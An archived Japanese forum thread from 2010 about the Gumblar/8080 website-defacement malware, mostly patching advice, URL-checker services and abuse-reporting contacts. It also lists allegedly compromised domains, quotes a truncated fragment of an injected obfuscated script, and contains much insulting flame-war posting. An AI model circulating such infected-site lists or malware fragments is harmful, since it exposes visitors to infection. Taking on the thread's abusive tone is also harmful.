【Gumblar/GENO】Web改竄ウイルス総合スレ9【8080】
レス数が1000を超えています。これ以上書き込みはできません。
0001名無しさん@お腹いっぱい。
2010/05/24(月) 13:39:24感染しているサイト・ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのFTPパスワードの変更を推奨します ***
【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ8【8080】
http://pc11.2ch.net/test/read.cgi/sec/1271787262/
0002名無しさん@お腹いっぱい。
2010/05/24(月) 13:39:59検索でチェッカー
http://www.google.co.jp/search?num=100&hl=ja&safe=off&rlz=1B3DVFA_ja___JP330&q=GetMoney%E3%80%80%E2%97%86yUyb3Tqn92&btnG=%E6%A4%9C%E7%B4%A2&aq=f&aqi=&aql=&oq=&gs_rfai=
0003名無しさん@お腹いっぱい。
2010/05/24(月) 13:41:57Gumblar(.x)、8080系ウイルス対処法。
行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
※サイトを運営されている方は、さらに次のことも実施していただきたい。
(1)管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
0004名無しさん@お腹いっぱい。
2010/05/24(月) 13:42:12行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
■Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
■サイトを運営されている方は、さらに次のことも実施していただきたい。
(1)管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
0005名無しさん@お腹いっぱい。
2010/05/24(月) 13:43:47現在の解決策
http://www.ikkaan.com
使用していないものはアンインストール推奨です
■ Windows XPは可能ならば新しいOSに
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic
0006名無しさん@お腹いっぱい。
2010/05/24(月) 13:45:00下記については必ずアップデートしてください
使用していないものはアンインストール推奨です
■ Windows XPは可能ならば新しいOSに
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■JRE(Java Runtime Environment)を更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
0007名無しさん@お腹いっぱい。
2010/05/24(月) 13:45:49まとめ
http://oceanplace.jp
0008名無しさん@お腹いっぱい。
2010/05/24(月) 13:47:35ウイルス・不正アクセス届出状況について(3月分および第1四半期)
http://atakizawa.com/at/5/4/index.html
(3)ウェブサイト改ざんの被害発生時の対処
ウェブサイトが改ざんされてしまった場合、ウェブサイト管理者は被害者であると同時に、ウェブサイト利用者に対する加害者となってしまう可能性があります。
被害の拡大を防ぐために、次に示すような対応が求められます。
▼まず初めに行うべきこと
まず初めに行うことは、早急にウェブサイトの公開を停止することです。同時に ftp のパスワードの変更も行ってください。
このとき、これまでウェブサイトの管理に利用していたパソコンには、ftp のパスワードを盗聴するウイルスが感染している可能性があるため、別のパソコンから操作することを勧めます。
同時に、別のウェブサイトを立てるなどして、ウェブサイト利用者に対して調査状況の説明や、問い合わせ用窓口を設けるなど、随時情報提供に努めてください。
▼改ざん箇所の洗い出し等の調査
上記の対応を行ったのち、保管しておいたクリーンなファイルとウェブサーバ上のファイルの比較などの方法で、全ての改ざん箇所の洗い出しを行ってください。
また、同じパソコンで管理しているウェブサイトが複数ある場合、他のウェブサイトにも改ざんが及んでいる可能性があるため、必ず全てのウェブサイトのファイルを確認してください。
また、改ざん期間等を把握するため、改ざん箇所ごとに ftp のアクセスログの確認などを行なって、被害状況等の調査を行ってください。
▼ウェブサイトを再公開する場合
上記の対応で全ての改ざん箇所の修正を行った上で、ウェブサイトの公開を再開する場合、必ずウェブサイト利用者への改ざんの事実の告知も掲載してください。
ウェブサイト再開の際には、判明した範囲で、次に示す情報を告知することを勧めます。
改ざんの事実の説明
・ 改ざんされていた箇所
・ 改ざんされていた期間
・ ウェブサイト利用者が改ざんされていた箇所を閲覧した場合に想定される被害(ウイルス感染など)の説明
・ ウイルスのチェック方法の説明(必要に応じてオンラインスキャンサイトの紹介など)
0009名無しさん@お腹いっぱい。
2010/05/24(月) 13:48:25※現時点では>>2以上の対策は不要です。
【改ざんサイトの調査など】
■ チェッカーサイト
・gredでチェック
ttp://www.gred.jp/
・aguse
ttp://www.aguse.net/
・WebGetter
ttp://rd.or.tp/get.php
・Dan's View Source
ttp://www.dan.co.uk/viewsource/
・飛び先のチェック by ぴょん基地の友達
ttp://www.kakiko.com/check/sample.html
0010名無しさん@お腹いっぱい。
2010/05/24(月) 13:50:131000 :名無しさん@お腹いっぱい。:2010/05/24(月) 13:33:02
1000なら(VдV) ◆yUyb3Tqn92の完全勝利!!!
>>999は苦しみながら悔しい思いをしながら死亡
更にそれ以外の弱者も普通に死亡
0011名無しさん@お腹いっぱい。
2010/05/24(月) 13:50:14■インシデント報告の届出(JPCERT/CC)
https://www.jpcert.or.jp/form/
■IPAに不正アクセスの届出
http://www.ipa.go.jp/security/ciadr/index.html
サイト管理者の連絡先不明の場合はWHOISからサーバー管理者へ通報してください。
以下、代表的なサーバー管理会社
デジロック https://www.value-domain.com/webabuse.php
OCN http://www.ocn.ne.jp/info/rules/abuse/
さくら https://secure.sakura.ad.jp/notify/form/abuse.phtml
ロリポップ https://lolipop.jp/support/inq/
GMOインターネットグループ https://secure.gmo.jp/contact/
インフォシーク (isweb) http://portal.faq.rakuten.co.jp/
DION http://www.auone-net.jp/security/knowledge/navi/index.html
NTTPCコミュニケーションズ http://www.nttpc.ne.jp/
ODN https://www.odn.ne.jp/support/question/input_netabuse.html
xserver (株式会社ベット) http://www.xserver.ne.jp/faq.php
heteml ヘテムル https://secure.heteml.jp/support/inquiry/
ファーストサーバ http://www.firstserver.co.jp/contact/index.html
エキサイト http://www.excite.co.jp/help/support
0012名無しさん@お腹いっぱい。
2010/05/24(月) 13:52:00■インシデント報告の届出(JPCERT/CC)
https://www.jpcert.or.jp/form/
■IPAに不正アクセスの届出
http://www.ipa.go.jp/security/ciadr/index.html
サイト管理者の連絡先不明の場合はWHOISからサーバー管理者へ通報してください。
以下、代表的なサーバー管理会社
デジロック https://www.value-domain.com/webabuse.php
OCN http://www.ocn.ne.jp/info/rules/abuse/
さくら https://secure.sakura.ad.jp/notify/form/abuse.phtml
ロリポップ https://lolipop.jp/support/inq/
GMOインターネットグループ https://secure.gmo.jp/contact/
インフォシーク (isweb) http://portal.faq.rakuten.co.jp/
DION http://www.auone-net.jp/security/knowledge/navi/index.html
NTTPCコミュニケーションズ http://www.nttpc.ne.jp/
ODN https://www.odn.ne.jp/support/question/input_netabuse.html
xserver (株式会社ベット) http://www.xserver.ne.jp/faq.php
heteml ヘテムル https://secure.heteml.jp/support/inquiry/
ファーストサーバ http://www.firstserver.co.jp/contact/index.html
エキサイト http://www.excite.co.jp/help/support
0013名無しさん@お腹いっぱい。
2010/05/24(月) 13:53:43○通報先・便利なリンク一覧
■警視庁匿名通報フォーム(通報は2chのように書き込むだけ)
http://www.keishicho.metro.tokyo.jp/anket/other.htm
■全国ハイテク警察リンク集 http://www002.upp.so-net.ne.jp/dalk/ksatulink.html
■警視庁ホームページ http://www.keishicho.metro.tokyo.jp/
■警察総合相談電話番号 http://www.npa.go.jp/safetylife/soudan/madoguchi.htm
(携帯電話・PHSからは全国共通#9110 緊急性を要するものは110)
■公安調査庁 http://www.moj.go.jp/KOUAN/
■国家公安委員会 http://www.npsc.go.jp/
■国際刑事警察機構(ICPO) http://www.interpol.int/
■国防省(アメリカ) http://www.defenselink.mil/
0014名無しさん@お腹いっぱい。
2010/05/24(月) 13:53:56その他、トラブル
http://search.yahoo.co.jp/search?p=%E3%81%8A%E5%B0%8F%E9%81%A3%E3%81%84%E3%82%B5%E3%82%A4%E3%83%88+%28%27%D0%B4%27%29%E3%81%AE%E4%BF%BA%E6%A7%98%E3%83%96%E3%83%AD%E3%82%B0&ei=UTF-8&fr=slv1-ff2tbtop&x=wrt
LAC セキュリティアラート
【注意喚起】Gumblar(ガンブラー)ウイルスによる新たなホームページ改ざん被害を確認
http://www.lac.co.jp/info/alert/alert20100303.html
> 株式会社ラックでは、Apacheの設定ファイルである「.htaccess」の不正アップロードを行うGumblarウイルスの活動を複数サイトにおいて確認しました。
ニュース・リリース|アンチウイルス・アンチウイルスソフトの【 カスペルスキー 】
Gumblar 亜種に続く、Pegel 対策に関する留意点
http://www.kaspersky.co.jp/news?id=207578803
> 感染が確認された場合は、対策として OS の再インストールをお勧めします。
セキュリティ通信
サイト改ざん猛威:感染パソコンの修復は「OSの再インストール」が近道
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2166
サイト改ざん(1)「告知せず」で感染拡大の恐れ〜負の連鎖を断ち切るために
http://www.so-net.ne.jp/security/news/library/2112.html
「ガンブラー」「サイト改ざん」めぐる基本のQ&A 〜 何が起きている? 対策は?
http://www.so-net.ne.jp/security/news/newstopics_201001.html
0015名無しさん@お腹いっぱい。
2010/05/24(月) 13:55:33死ね!無能!死ね!
00161-
2010/05/24(月) 13:56:360017名無しさん@お腹いっぱい。
2010/05/24(月) 13:57:550018名無しさん@お腹いっぱい。
2010/05/24(月) 13:58:360019名無しさん@お腹いっぱい。
2010/05/24(月) 13:59:000020名無しさん@お腹いっぱい。
2010/05/24(月) 14:00:27顔文字の一人勝ち状態だな
もうこれだけ完璧にやりたい放題やったんだから
別のスレに住んでくれ
0021名無しさん@お腹いっぱい。
2010/05/24(月) 14:01:14ばかじゃね
0022名無しさん@お腹いっぱい。
2010/05/24(月) 14:01:19馬鹿
そこで顔真っ赤にしてほざくから馬鹿なんだよ
馬鹿はスレ立てるなよ馬鹿
0023名無しさん@お腹いっぱい。
2010/05/24(月) 14:02:490024名無しさん@お腹いっぱい。
2010/05/24(月) 14:03:031000取られたのはそこそこ有名なコテだから仕方ない
コテ本人じゃなくても知り合いみたいな取り巻きがやりかねん
0025名無しさん@お腹いっぱい。
2010/05/24(月) 14:03:16どちらも最悪板とかの違う板でやれや。邪魔。
0026名無しさん@お腹いっぱい。
2010/05/24(月) 14:04:09未だに顔真っ赤にしてるってことか
だからあれほどスレチには触れるなと言ったのに・・・その赤い顔もう元に戻らないかも
0027名無しさん@お腹いっぱい。
2010/05/24(月) 14:04:51『確かにコテの勝ちかもしれない 』w
0028名無しさん@お腹いっぱい。
2010/05/24(月) 14:06:10と書かれて、即レスした奴がコテにウイルス踏まされて粘着してた馬鹿だろうなw
釣りやすいw
0029名無しさん@お腹いっぱい。
2010/05/24(月) 14:07:57乙
0030名無しさん@お腹いっぱい。
2010/05/24(月) 14:08:380031名無しさん@お腹いっぱい。
2010/05/24(月) 14:23:130032名無しさん@お腹いっぱい。
2010/05/24(月) 14:34:250033名無しさん@お腹いっぱい。
2010/05/24(月) 14:45:31http://live.nicovideo.jp/watch/lv17768764
0034名無しさん@お腹いっぱい。
2010/05/24(月) 18:43:370035名無しさん@お腹いっぱい。
2010/05/24(月) 19:01:040036名無しさん@お腹いっぱい。
2010/05/24(月) 19:24:46設定例:JaneView
設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
http://www.geocities.jp/nanasi_san_exe/online_help/option/function/command.html
これで専ブラから検索でチェックできるようになります。
以下がそのコマンドの一例になります。
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK
0037名無しさん@お腹いっぱい。
2010/05/24(月) 20:02:29テンプレ案もあったようだけど?
コテ自体が立てたんなら建て直してもいいかもな
0038名無しさん@お腹いっぱい。
2010/05/24(月) 20:09:090039名無しさん@お腹いっぱい。
2010/05/24(月) 20:25:300040名無しさん@お腹いっぱい。
2010/05/24(月) 20:26:150041名無しさん@お腹いっぱい。
2010/05/24(月) 20:27:160042名無しさん@お腹いっぱい。
2010/05/24(月) 20:27:220043名無しさん@お腹いっぱい。
2010/05/24(月) 20:28:38どや顔したのは誰だったかなー
0044名無しさん@お腹いっぱい。
2010/05/24(月) 20:29:500045名無しさん@お腹いっぱい。
2010/05/24(月) 20:30:560046名無しさん@お腹いっぱい。
2010/05/24(月) 20:32:510047名無しさん@お腹いっぱい。
2010/05/24(月) 20:41:07それともあほコテが混ざってんのか
0048名無しさん@お腹いっぱい。
2010/05/24(月) 20:43:150049名無しさん@お腹いっぱい。
2010/05/24(月) 20:44:120050名無しさん@お腹いっぱい。
2010/05/24(月) 21:36:140051コテハン ◆8080adndqg
2010/05/24(月) 22:18:16tw13●net/
↓
tw13●net/vogue/vogue/index●html
tw13●net/scratch/
他多数
0052名無しさん@お腹いっぱい。
2010/05/24(月) 22:24:21Gumblar/8080 Checker
ttp://ec2-204-236-148-61.us-west-1.compute.amazonaws.com/
0053名無しさん@お腹いっぱい。
2010/05/24(月) 22:46:24管理もまともで安全と見ていいのかな?
0054名無しさん@お腹いっぱい。
2010/05/24(月) 22:59:10それはないわ
例えば毎日出勤してるってだけで全員仕事できる人か?
0055八頭 ◆YAGApwSaEw
2010/05/24(月) 23:02:14ttp://www.raymond.cc/blog/archives/2010/05/23/urlvoid-scans-websites-for-viruses-with-multiple-scanning-engines/
↓
NEW!
◆「URLVoid.com - BETA」 (9種類のサイト安全性チェックを一度に)
ttp://www.urlvoid.com/
*BrowserDefender (Microsoft)
*Google Diagnostic
*MalwareDomainList
*McAfee SiteAdvisor
*McAfee Trusted Secure
*MyWOT
★Norton SafeWeb
*TrendMicro Web Reputation
*Web Security Guard (ttp://www.websecurityguard.com/about.aspx)
onlinelinkscan.comとは重複しない安全性チェックになっているので、併用がベストです
◆「http://onlinelinkscan.com」 (4種類のサイト安全性チェックを一度に Google Safe Browsing ,PhisTank ,AVG ,SiteTruth)
0056名無しさん@お腹いっぱい。
2010/05/24(月) 23:12:46専ブラ登録するコマンド教えてもらえんじゃろか?
0057名無しさん@お腹いっぱい。
2010/05/24(月) 23:16:230058名無しさん@お腹いっぱい。
2010/05/24(月) 23:53:010059名無しさん@お腹いっぱい。
2010/05/24(月) 23:55:08またこれか
0060名無しさん@お腹いっぱい。
2010/05/24(月) 23:57:35とにかくJavaスプリクト系の機能を無効にしとく
0061名無しさん@お腹いっぱい。
2010/05/24(月) 23:58:39http://www.virustotal.com/jp/analisis/aafd26f4ba93a2b06e8675100040a94e62f97220dc8c59c14f7e19f0f39103ab-1274712978
ふむ…
0062(VдV) ◆yUyb3Tqn92
2010/05/25(火) 00:06:17改竄ウィルスのスレだけにテンプレも改竄ってか!!!!!
しかも
お前ら今日中、この顔文字様のことで頭いっぱい胸いっぱいだったようだな(>w<)
でもな、あれは顔文字だ!いやお前が顔文字だ!とお前らが被害妄想に陥ってる時点で俺様の作戦勝ち('д')v
0063(VдV) ◆yUyb3Tqn92
2010/05/25(火) 00:07:56(*VдV*)褒めて遣わす!
しかしお前ら鈍いなぁ
テンプレの真の真実に気づいてない馬鹿が多い
0064(VдV) ◆yUyb3Tqn92
2010/05/25(火) 00:12:32またまたヽ(VдV)ノ俺様の計画通りだお♪
おかげで今夜もぐっすりぐっす眠できすお(=∀=)ニパー
それにしてもお前のセンスのないつまらない書き込み見てると
一番悪意に満ちているはずの俺様の書き込みがとてもキュートに見えてくる
そう。俺様はこのスレのマスコット的な存在になりつつある(Vд^)−☆
0065名無しさん@お腹いっぱい。
2010/05/25(火) 00:17:530066名無しさん@お腹いっぱい。
2010/05/25(火) 00:18:56まぁ、一人で妄想してな(´∀`)
0067(VдV) ◆yUyb3Tqn92
2010/05/25(火) 00:26:45必死にアンカまで細かく付けちゃってどしたの?笑
悔しそうな負け犬の遠吠えも見れたことだし
今夜はおやすみしちゃうね(~д~)zZZ←調子乗った状態で眠りにつく俺w
0069名無しさん@お腹いっぱい。
2010/05/25(火) 00:36:25褒めるわけじゃないが
ほんと人をムカつかせるのがうまいコテだな
その才能だけは認めてやる
だから
もう
おまえも
おやすみ
0070名無しさん@お腹いっぱい。
2010/05/25(火) 00:38:14http://vurldissect.co.uk/
こちらもチェックにどうぞ
0071あんちたった
2010/05/25(火) 00:39:31だれかおれにトリップの付け方教えてくれー
ぐぐるのやだよーう(´;ω;`)
0072あんちたった♯tesとん
2010/05/25(火) 00:40:33簡単だった
いでよ俺のトリップ
0073あんちたった ◆a.oH.VVCow
2010/05/25(火) 00:41:370074名無しさん@お腹いっぱい。
2010/05/25(火) 00:42:16なしにはならないwwwwwww
0076名無しさん@お腹いっぱい。
2010/05/25(火) 00:44:01ここまで酷いとは
0077名無しさん@お腹いっぱい。
2010/05/25(火) 00:56:580078あんちたった
2010/05/25(火) 00:58:17俺は偽が出るのを承知であえてトリップつけてないわけだがココまでバカにされるとむかつくわ
0079名無しさん@お腹いっぱい。
2010/05/25(火) 01:04:30誤魔化さなくていいよw
トリップ付け間違い乙!www
しかもむかつくとかほざくならトリップ付ければ済むことだろう
本当に馬鹿なんだな
0080名無しさん@お腹いっぱい。
2010/05/25(火) 01:10:48>>79じゃないが、こんなことでファビョるんだったら最初から酉しとけよ
0081名無しさん@お腹いっぱい。
2010/05/25(火) 01:15:04うー
だれかおれにトリップの付け方教えてくれー
ぐぐるのやだよーう(´;ω;`)
72 :あんちたった♯tesとん:2010/05/25(火) 00:40:33
ぐぐったら
簡単だった
いでよ俺のトリップ
73 :あんちたった ◆a.oH.VVCow :2010/05/25(火) 00:41:37
今のなしでよろ
75 :あんちたった ◆a.oH.VVCow :2010/05/25(火) 00:42:57
>>74
しね
人のミスをそうやって鬼の首とったみたいに言うのよくないぞ
76 :名無しさん@お腹いっぱい。:2010/05/25(火) 00:44:01
あんちたったが頭の悪い子なのは前から知ってたけど
ここまで酷いとは
77 :名無しさん@お腹いっぱい。:2010/05/25(火) 00:56:58
ひでぇw
78 :あんちたった:2010/05/25(火) 00:58:17
偽者乙。
俺は偽が出るのを承知であえてトリップつけてないわけだがココまでバカにされるとむかつくわ
0082名無しさん@お腹いっぱい。
2010/05/25(火) 01:18:22偽者ってことにして逃げようと必死になっちゃったことで逆に痛さを増しちゃってるよこの人
自分でむかつくとか書いちゃう性格からして、今頃、画面の前でもっとむかつてそうだなwww
0083名無しさん@お腹いっぱい。
2010/05/25(火) 01:20:130084WARNING(=あんちたった) ◆MOTO.0SDfQ
2010/05/25(火) 01:21:23>しかもむかつくとかほざくならトリップ付ければ済むことだろう
まさかココまでバカなキャラにされるとは思わなかったんだよ!
0085あんちたった ◆MOTO.0SDfQ
2010/05/25(火) 01:27:170086名無しさん@お腹いっぱい。
2010/05/25(火) 01:30:180087名無しさん@お腹いっぱい。
2010/05/25(火) 01:32:20IDのあるなしは関係ない
自分の書き込み見直してどうしてこうなったかよく考えろ
お前はどれだけ自分が頭が悪いか自覚しないと治らないからw
0088名無しさん@お腹いっぱい。
2010/05/25(火) 01:33:020089名無しさん@お腹いっぱい。
2010/05/25(火) 01:36:17お前コテ向いてないwwww
(VдV) ◆yUyb3Tqn92に弟子入りしてこいよww
コテは最低限のずる賢さと図太さがないとやってけないぞw
0090名無しさん@お腹いっぱい。
2010/05/25(火) 01:38:57知能レベルの低さと文体が似すぎてるからほぼ確定だろ
0091名無しさん@お腹いっぱい。
2010/05/25(火) 01:42:39その関連スレに集まるのは必然だが
そのスレにウイルス踏ませた張本人がいたとしたら!?
こうやってこのスレにコテにウイルス踏まされた奴が集まっていって
粘着住人が量産される仕組みだったりしてな
・・・・・考えすぎか
0092名無しさん@お腹いっぱい。
2010/05/25(火) 01:46:17こうやってちゃんと告知してくれるとありがたいな
ソネットに載ったら笑えるがww
0093あんちたった ◆MOTO.0SDfQ
2010/05/25(火) 01:59:18うわぁ、悪質やなwww
知らない人は踏んじゃうかも知れんな、顔文字の仕業か?
0095名無しさん@お腹いっぱい。
2010/05/25(火) 02:03:49いつまで見苦しい言いわけ続けるんだ
飽きたから死ね
0096あんちたった ◆MOTO.0SDfQ
2010/05/25(火) 02:04:32煽りはスルーな!
0097名無しさん@お腹いっぱい。
2010/05/25(火) 02:06:43はいおしまい
0098名無しさん@お腹いっぱい。
2010/05/25(火) 02:08:38立場がもっと悪くなることもある
[「ホリプロ」サイト、ガンブラー感染公表せず : ニュース・新製品 : セキュリティー : ネット&デジタル : YOMIURI ONLINE(読売新聞)]
http://www.yomiuri.co.jp/net/security/s-news/20100122-OYT8T00417.htm
[ガンブラー対策、 ウェブ制作会社名の公表が有効 | BPnetビズカレッジ:トレンド | nikkei BPnet 〈日経BPネット〉]
http://www.nikkeibp.co.jp/article/column/20100208/209583/?P=1
それにしてもテンプレにGENO張るのはまずいよ
やめてくれよ
0099名無しさん@お腹いっぱい。
2010/05/25(火) 02:17:06>>5はまだ修正されていないので、宴会予約フォームで連絡してみましたがどうなることやら…
0100名無しさん@お腹いっぱい。
2010/05/25(火) 06:04:07くだらなすぎる
奴が現れる前後で書き込まれるコメには特長あるから
どんな形であっても誉めるような、意味のわからないコメは自演と見ていい
なににベクトルが向いてるのかを考えたら、浮いたコメはすぐにわかる
時間がいくらでもある廃人には勝てないので、相手する意味も価値もなし
このスレに以前から居る人はほとんど参加してないとは思うけど
0101名無しさん@お腹いっぱい。
2010/05/25(火) 06:08:130102(VдV) ◇yUyb3Tqn92
2010/05/25(火) 13:08:000103名無しさん@お腹いっぱい。
2010/05/25(火) 13:20:140104名無しさん@お腹いっぱい。
2010/05/25(火) 14:49:09population-japan●com
shibahoru●chicappa●jp/blog/
www●konishi-chem●co●jp
0105名無しさん@お腹いっぱい。
2010/05/25(火) 15:02:45改ざんされてる通販サイトはインターネット通販止めろ
0106名無しさん@お腹いっぱい。
2010/05/25(火) 15:54:03Ubuntu辺り入れてWebブラウジングは仮想ブラウザでやればウイルスとは無縁でいられるかね
0107名無しさん@お腹いっぱい。
2010/05/25(火) 16:01:39それでも不安ならせいぜいスクリプトきっとけ
0108名無しさん@お腹いっぱい。
2010/05/25(火) 16:01:51シロウトがマルチブートやるとろくなことにならん
0109名無しさん@お腹いっぱい。
2010/05/25(火) 16:05:27スクリプトなんてとっくに切ってるよ
0110名無しさん@お腹いっぱい。
2010/05/25(火) 16:06:550111コテハン ◆8080adndqg
2010/05/25(火) 16:25:28ama●minasan●info/
butuda●f00●jp
kadaru●mydns●to/ ←なんとかしろよw
↓
センセイに聞いてみた
www●google●co●jp/search?hl=ja&source=hp&q=site%3Akadaru●mydns●to%2F+-nsx+-ms
www●woman-seiwa●co●jp/ ←通販
www●ne●jp/asahi/sanya/sanpo ←絶賛放置中
unice●jp/
www●stopper-k●co●jp/
retri●jp/ ←?
0112名無しさん@お腹いっぱい。
2010/05/25(火) 16:54:36とりあえず怖くなってここに初めて来たって人なら>>3>>4済ませておけば05/25現時点では大丈夫のはず。
JREは上書きアプデだと前のデータが残ってるかもしれないからコンパネで消して新しく入れ直した方が良いんだっけ?
0113名無しさん@お腹いっぱい。
2010/05/25(火) 17:38:44そういうのはアップデートしても元から入ってる奴がこっそり残ってる、って話じゃなかったっけ
まあどちらにしろ消してから入れるってのが無難か
0114名無しさん@お腹いっぱい。
2010/05/25(火) 18:12:34firefoxのアドオンに古いバージョンが残ったままで消えない
これは無効にしてれば大丈夫なのかな
0115コテハン ◆8080adndqg
2010/05/25(火) 18:26:25↓
8080の下に転がってる
str="<ijbwjuics src=" + unescape(・・・
こいつは新型かな?
0116名無しさん@お腹いっぱい。
2010/05/25(火) 18:42:05>www●ne●jp/asahi/sanya/sanpo ←絶賛放置中
ttp://www.aguse.jp/?m=w&url=www.ne.jp%2Fasahi%2Fsanya%2Fsanpo&x=55&y=17
株式会社朝日ネットから連絡してくれるそうです
電凸すると電凸貧乏になるから
折り返し連絡をくれるとたすかる
朝日ネット◎
0117名無しさん@お腹いっぱい。
2010/05/25(火) 18:46:22変な設定しない限り、インストールされた最新版が利用されるはずなんだけど
JRE1.xとか古いのが入ってると、そっちが呼び出されたり変な動作する可能性があるって聞いた
ttp://www.cals.jacic.or.jp/coresc/Member5/johokoukai05_06.htm
ttp://www.ebid.pref.fukui.jp/cgi-bin/blt.pl
ttp://ebid-portal.kumamoto-idc.pref.kumamoto.jp/vista.html
JRE1.xとか窓から投げ捨てろと言いたいのに
政府官庁自治体系システムはホント癌だわ
0118名無しさん@お腹いっぱい。
2010/05/25(火) 18:54:38www●my-standard●co●jp
wangnin●com
www●pasotasu●net←パソコントラブル解決?無理でしょ
www●mamapapa●net←pasotasuが作成しているサイト
0119名無しさん@お腹いっぱい。
2010/05/25(火) 19:23:26aguseでは、上から一つ目三つ目だけGumblarの疑いありの判断。
gredでは、すべてSAFEと判断。
こういったツールすらスルーするものをここで報告してる人はどうやって見つけてんの
感染してそうなサイトをしらみ潰しにソース見てるとか?
0120名無しさん@お腹いっぱい。
2010/05/25(火) 19:31:15見つけてくるんじゃなくて、自分で仕込んで
ここで晒してるだけなんだよw
0121名無しさん@お腹いっぱい。
2010/05/25(火) 20:07:35分からない人は知る必要がないよ
対策をちゃんとしてればいい
0122名無しさん@お腹いっぱい。
2010/05/25(火) 20:44:000123名無しさん@お腹いっぱい。
2010/05/25(火) 20:45:02鯖缶から該当サイトに伝達のお返事ありました。
401になってます。
0124名無しさん@お腹いっぱい。
2010/05/25(火) 21:42:01一部の感染だけは認めるが後はでっち上げか
0125名無しさん@お腹いっぱい。
2010/05/25(火) 21:45:040126名無しさん@お腹いっぱい。
2010/05/25(火) 21:47:030127名無しさん@お腹いっぱい。
2010/05/25(火) 21:55:130128名無しさん@お腹いっぱい。
2010/05/25(火) 21:57:52全部見たわけじゃないけど
例えばpasotasuは明らかに今日修正してる
他のページは2009年のほぼ同時刻にまとめて更新されてるのに特定ページだけ今日更新
しかも発見が遅れたTOPじゃないページは4時間後に修正
原因わかってないだろうから再改ざんされる可能性が高い
top Tue, 25 May 2010 08:16:10 GMT
repair.html Tue, 25 May 2010 12:50:38 GMT
hoshu.html Wed, 29 Jul 2009 01:32:40 GMT
order.html Wed, 29 Jul 2009 01:32:47 GMT
price.html Wed, 29 Jul 2009 01:32:47 GMT
